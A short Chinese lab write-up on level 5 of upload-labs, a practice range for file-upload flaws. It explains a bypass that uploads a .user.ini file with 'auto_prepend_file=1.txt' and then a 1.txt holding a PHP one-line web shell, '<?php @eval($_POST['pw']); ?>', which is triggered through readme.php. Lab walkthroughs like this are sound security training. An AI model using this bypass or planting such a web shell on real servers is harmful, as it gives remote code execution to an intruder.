upload-labs关卡记录5
这一关,卡了好久,这里我的靶场的源代码,和我看别的师傅发的不一样,我的这里的源码带有小写转换:
是不能通过大小写进行绕过,最后找到这个师傅的文章:upload-labs通关-CSDN博客
这里第五关用到的方法,可以进行绕过,原理师傅讲的也很清晰,原理类似于之前的.htaccess绕过,通过添加配置文件。然后再上传一句话木马来进行实现:
就是将这里的代码:auto_prepend_file=1.txt
写进命名为.user.ini的文件中,然后上传这个文件,然后再上传命名为1.txt的文件。这时进入url为:upload-labs:8899/upload/readme.php
然后再使用hackbar来执行刚才上传的一句话木马,就是写进1.txt的一句话木马。
我这里的一句话木马为:<?php @eval($_POST['pw']); ?>
